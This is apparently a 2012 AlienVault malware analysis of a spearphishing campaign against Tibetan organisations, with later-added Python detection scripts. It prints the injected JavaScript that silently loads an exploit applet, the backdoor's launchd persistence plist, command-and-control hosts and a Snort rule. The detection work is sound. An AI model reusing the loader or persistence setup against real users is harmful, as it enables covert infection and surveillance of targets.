AlienVault Tibet related Research now used to target Tibetan non-governmental organizations

March 19, 2012 | Jaime Blasco

A few hours ago Greg Walton posted a warning about spearphishing emails sent to non-governmental organizations related to Tibet. The content of these emails refers to our previous research, Targeted Attacks against Tibetan organizations.

—————Forwarded message—————

From: webmaster <[email protected]>

Date: Mon, Mar 19, 2012 at 8:20 AM

Subject: Targeted attacks against Tibet organizations

To: ......

We recently detected several targeted attacks against Tibetan activist organizations including the Central Tibet Administration and International Campaign for Tibet, among others.

Here is one of the emails detected:

[ More information ]

It contains a link to hxxp://dns.assyra.com/ that hosts a copy of our blog post but includes some Javascript:

<script>
// Creates a 1x1 (effectively invisible) Java applet element
var emb = document.createElement('applet');
emb.setAttribute('name', 'applet');
emb.setAttribute('width', '1');
emb.setAttribute('height', '1');
emb.setAttribute('code', 'Func1.class');
// Picks the JAR to load from the browser's user agent
if (navigator.userAgent.indexOf('Win') != -1){
    emb.setAttribute('archive', 'default.jar');
}
else if (navigator.userAgent.indexOf('Linux') != -1){
    emb.setAttribute('archive', 'index.jar');
}
else if (navigator.userAgent.indexOf('Mac') != -1){
    emb.setAttribute('archive', 'index.jar');
}
// Attaching the element to the page triggers the applet load
document.body.appendChild(emb);
</script>

The domain shenhuawg.com is also pointing to that server.

Based on the user-agent (Mac or Windows) it loads a Java applet that exploits CVE-2011-3544.
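The injected loader is small enough to fingerprint from page source. The following Python script is an added example (it is not part of the original post or of AlienVault's tooling) that scans a script body for the combination of traits the injected code shows: creation of an applet element, a 1x1 size, a .jar archive, and user-agent branching. The indicator names, the regular expressions and the three-indicator threshold are my own choices; the suspicious input is the post's loader reproduced as test data, and the benign snippet is constructed for comparison.

```python
import re

# Constructed test input: the loader quoted in the post, reproduced as a string.
SUSPICIOUS_SCRIPT = """
var emb = document.createElement('applet');
emb.setAttribute('name', 'applet');
emb.setAttribute('width', '1');
emb.setAttribute('height', '1');
emb.setAttribute('code', 'Func1.class');
if (navigator.userAgent.indexOf('Win') != -1){
emb.setAttribute('archive', 'default.jar');
}
else if (navigator.userAgent.indexOf('Linux') != -1){
emb.setAttribute('archive', 'index.jar');
}
else if (navigator.userAgent.indexOf('Mac') != -1){
emb.setAttribute('archive', 'index.jar')
}
document.body.appendChild(emb);
"""

# Constructed benign script that also builds a DOM element dynamically.
BENIGN_SCRIPT = """
var img = document.createElement('img');
img.setAttribute('src', '/logo.png');
img.setAttribute('width', '120');
document.body.appendChild(img);
"""

# Indicator name -> regex. Quotes may be single or double; matching is case-insensitive.
INDICATORS = {
    "creates_applet_element": re.compile(r"""createElement\(\s*['"]applet['"]\s*\)""", re.I),
    "loads_jar_archive": re.compile(r"""setAttribute\(\s*['"]archive['"]\s*,\s*['"][^'"]+\.jar['"]""", re.I),
    "one_pixel_size": re.compile(r"""setAttribute\(\s*['"](?:width|height)['"]\s*,\s*['"]1['"]""", re.I),
    "user_agent_branching": re.compile(r"navigator\.userAgent\.indexOf\(", re.I),
}

JAR_RX = re.compile(r"""setAttribute\(\s*['"]archive['"]\s*,\s*['"]([^'"]+\.jar)['"]""", re.I)


def scan_script(source):
    """Return the sorted list of indicator names that fire on one script body."""
    return sorted(name for name, rx in INDICATORS.items() if rx.search(source))


def jar_archives(source):
    """Return the distinct JAR file names the script would load, sorted."""
    return sorted(set(JAR_RX.findall(source)))


def is_hidden_applet_loader(source, threshold=3):
    """Heuristic verdict: three or more indicators together is treated as a hidden applet loader."""
    return len(scan_script(source)) >= threshold


if __name__ == "__main__":
    for label, src in (("page sample", SUSPICIOUS_SCRIPT), ("benign", BENIGN_SCRIPT)):
        print(label, scan_script(src), jar_archives(src), is_hidden_applet_loader(src))
```

Run over fetched page bodies, the jar names it extracts are what you would then pull for analysis or block at the proxy; the threshold keeps a lone `navigator.userAgent` check from firing on ordinary feature-detection code.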

https://www.virustotal.com/file/d4b394844e8357a15bf6e76cb15db05a8b073b026a813d11e35211bb96caad52/analysis/1332192121/

https://www.virustotal.com/file/13f596019477b51c311f19f9adc2e4f9628ad98df1a55db6c707521ed944ec90/analysis/

The attack contains malware to infect both Windows and MacOSX.

The MacOSX backdoor has 0/0 antivirus detection rate:

https://www.virustotal.com/file/143969e8eaed6269ac6c55e2a861cdde81947e7c45e5d27e939d4bbb1c9ac8cd/analysis/1332184087/

bash-3.2# nm -a file.tmp
U ___error
U ___memcpy_chk
U ___stack_chk_fail
U ___stack_chk_guard
U ___strcat_chk
0000000100000000 A __mh_execute_header
U _alarm
U _close
U _connect
U _creat
U _dup2
U _execl
U _exit
U _fork
U _gethostbyname
U _getpid
U _getpwuid
U _gettimeofday
U _getuid
U _ioctl
U _malloc
U _memcmp
U _memcpy
U _memset
U _open
U _openpty
U _putenv
U _rand
U _read
U _recv
U _select$1050
U _send
U _setsid
U _shutdown
U _signal
U _sleep
U _socket
U _strncpy
U _ttyname
U _waitpid
U _write
U dyld_stub_binder
0000000005614542 - 00 0000   OPT radr://5614542

bash-3.2# otool -L file.tmp
file.tmp:
/usr/lib/libSystem.B.dylib (compatibility version 1.0.0, current version 125.2.10)

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
    <key>Label</key>
    <string>com.apple.docserver</string>
    <key>Program</key>
    <string>/Library/Audio/Plug-Ins/AudioServer</string>
    <key>RunAtLoad</key>
    <true/>
</dict>
</plist>
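The launchd property list above is the kind of artifact a host audit can catch: the label imitates an Apple service, yet the program lives under an audio plug-in directory and runs at load. The following Python script is an added example (not from the original post or from AlienVault) that parses launchd plists with the standard library and reports such mismatches. The list of directories treated as legitimate homes for Apple-labelled jobs, the finding names and the benign comparison plist are my own assumptions; the first sample reproduces the plist from the post, with the whitespace around the program path stripped.

```python
import plistlib

# Constructed test input 1: the launchd plist quoted in the post.
MALICIOUS_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.apple.docserver</string>
<key>Program</key>
<string>/Library/Audio/Plug-Ins/AudioServer</string>
<key>RunAtLoad</key>
<true/>
</dict>
</plist>
"""

# Constructed test input 2: a benign third-party job for comparison.
BENIGN_PLIST = b"""<?xml version="1.0" encoding="UTF-8"?>
<plist version="1.0">
<dict>
<key>Label</key>
<string>com.example.backup</string>
<key>ProgramArguments</key>
<array><string>/usr/local/bin/backup</string><string>--nightly</string></array>
<key>StartInterval</key>
<integer>86400</integer>
</dict>
</plist>
"""

# Assumed: directories where jobs labelled com.apple.* legitimately keep their binaries.
APPLE_BINARY_PREFIXES = ("/System/", "/usr/libexec/", "/usr/sbin/", "/usr/bin/", "/Library/Apple/")


def program_path(job):
    """Resolve the executable from Program, or ProgramArguments[0] when Program is absent."""
    if "Program" in job:
        return job["Program"].strip()
    args = job.get("ProgramArguments") or []
    return args[0].strip() if args else ""


def audit_launchd_job(data):
    """Return the list of findings for one launchd plist given as bytes."""
    job = plistlib.loads(data)
    label = job.get("Label", "")
    path = program_path(job)
    findings = []
    # An Apple-looking label whose binary is outside Apple's own directories.
    if label.startswith("com.apple.") and not path.startswith(APPLE_BINARY_PREFIXES):
        findings.append("apple_label_nonapple_binary")
    # Executables do not belong in the audio plug-in tree.
    if path.startswith("/Library/Audio/Plug-Ins/"):
        findings.append("binary_in_plugin_directory")
    # Start-at-boot and restart-on-exit are the usual persistence knobs.
    if job.get("RunAtLoad") is True:
        findings.append("run_at_load")
    if job.get("KeepAlive"):
        findings.append("keep_alive")
    return findings


if __name__ == "__main__":
    for name, data in (("page sample", MALICIOUS_PLIST), ("benign", BENIGN_PLIST)):
        print(name, audit_launchd_job(data))
```

On a live system you would feed it every file under /Library/LaunchAgents, /Library/LaunchDaemons and each user's ~/Library/LaunchAgents; the "apple_label_nonapple_binary" finding alone is worth triaging on any Mac.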

The trojan connects to the following server:

dns.assyra.com (100.42.217.73)

100.42.208.0 - 100.42.223.255

530 W. 6th St Suite 701

Los Angeles, CA

US

The domain assyra.com has been involved in several past attacks using Win32/Protux.

The Windows payload is detected by AVG as BackDoor.Generic15.VKZ

https://www.virustotal.com/file/5513b45a4856f7941d71cf0885380469fdc22ece101d0399baabc9bd8b5536be/analysis/

The Windows payload seems to have been created 6 days ago:

It copies itself to "C:\WINDOWS\system32\2019\svchost .exe" and modifies HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders -> Startup to maintain persistence.

It connects to the following servers:

tibet.zyns.com (100.42.217.73)

100.42.208.0 - 100.42.223.255

530 W. 6th St Suite 701

Los Angeles, CA

US

yahoo.xxuz.com (100.42.217.91)

100.42.208.0 - 100.42.223.255

530 W. 6th St Suite 701

Los Angeles, CA

US

lyle.changeip.org (100.42.217.73)

100.42.208.0 - 100.42.223.255

530 W. 6th St Suite 701

Los Angeles, CA

US

Once it connects to one of the servers (port 8080), it sends some information about the victim, such as the ComputerName, using some obfuscation:

You can use the following rule to catch this traffic on your network:

alert tcp $HOME_NET any -> $EXTERNAL_NET 8080 (msg:"MALWARE WUpdater checkin"; content:"|3C|html|3E||3C|title|3E|12356|3C||2F|title|3E||3C|body|3E|"; depth:33; classtype:trojan-activity; sid:11111111111111; rev:1;)
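To see exactly what that rule matches, the following Python script is an added example (not from the original post) that decodes the rule's content string, where text between pipes is hex and text outside is literal, and applies it with the same depth semantics Snort uses: the pattern has to sit entirely inside the first 33 bytes of the payload. The sample payloads are constructed; the obfuscated victim data after the HTML prefix is made up and does not reproduce the real beacon.

```python
# The content:, depth: and destination-port parts of the post's rule.
RULE_CONTENT = "|3C|html|3E||3C|title|3E|12356|3C||2F|title|3E||3C|body|3E|"
RULE_DEPTH = 33
RULE_DST_PORT = 8080


def parse_snort_content(spec):
    """Turn a Snort content string into raw bytes.

    Text outside pipes is literal; text between pipes is hex byte values
    (whitespace allowed). Adjacent blocks such as '|3E||3C|' are two hex blocks.
    """
    out = bytearray()
    in_hex = False
    for part in spec.split("|"):
        if in_hex:
            out.extend(bytes.fromhex(part.replace(" ", "")))
        else:
            out.extend(part.encode("latin-1"))
        in_hex = not in_hex
    return bytes(out)


def content_matches(payload, content, depth=None, offset=0):
    """Snort-style content test: the pattern must lie fully within
    payload[offset:offset+depth] (depth=None means the rest of the payload)."""
    window = payload[offset:] if depth is None else payload[offset:offset + depth]
    return content in window


CHECKIN_CONTENT = parse_snort_content(RULE_CONTENT)


def is_wupdater_checkin(payload, dst_port):
    """Apply the post's rule to one outbound TCP payload."""
    return dst_port == RULE_DST_PORT and content_matches(payload, CHECKIN_CONTENT, depth=RULE_DEPTH)


# Constructed sample flows as (destination port, payload bytes).
SAMPLES = [
    # Beacon at the start of the payload: alert.
    (8080, b"<html><title>12356</title><body>Q29tcHV0ZXJOYW1l"),
    # Same beacon shifted by two bytes, so it ends past byte 33: no alert.
    (8080, b"AB<html><title>12356</title><body>Q29tcHV0ZXJOYW1l"),
    # Right content, wrong destination port: no alert.
    (80, b"<html><title>12356</title><body>Q29tcHV0ZXJOYW1l"),
]


def evaluate_samples(samples=SAMPLES):
    """Return one verdict per sample flow."""
    return [is_wupdater_checkin(payload, port) for port, payload in samples]


if __name__ == "__main__":
    print(CHECKIN_CONTENT, len(CHECKIN_CONTENT))
    for (port, payload), hit in zip(SAMPLES, evaluate_samples()):
        print(port, payload[:40], "ALERT" if hit else "pass")
```

The decoded pattern is 32 bytes, so depth:33 leaves one byte of slack before the fake HTML; a check-in that arrives after any longer prefix will be missed, which is the trade-off the depth keyword buys for speed. Snort stores sid as a 32-bit value, so replace the placeholder sid in the rule with one from your local range (1000000 and above) before loading it.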

We will publish more information about this and ongoing attacks as soon as we have more information. Stay tuned.

Update: There is another sample of BackDoor.Generic15.VKZ (222a150bf0399f23af6d59f695304610) which used 11.36.214.140 as the C&C server. Check your logs!

Jaime Blasco

About the Author: Jaime Blasco
Jaime Blasco is a renowned Security Researcher with broad experience in network security, malware analysis and incident response. At AlienVault, Jaime leads the Lab Intelligence and Research team that leads the charge of researching and integrating threat intelligence into detection mechanisms. Prior to working at AlienVault he founded a couple of startups (Eazel, Aitsec) working on web application security, source code analysis and incident response. He is based in San Francisco. Jaime's work in emerging threats and targeted attacks is frequently cited in international publications such as New York Times, BBC, Washington Post and Al Jazeera.
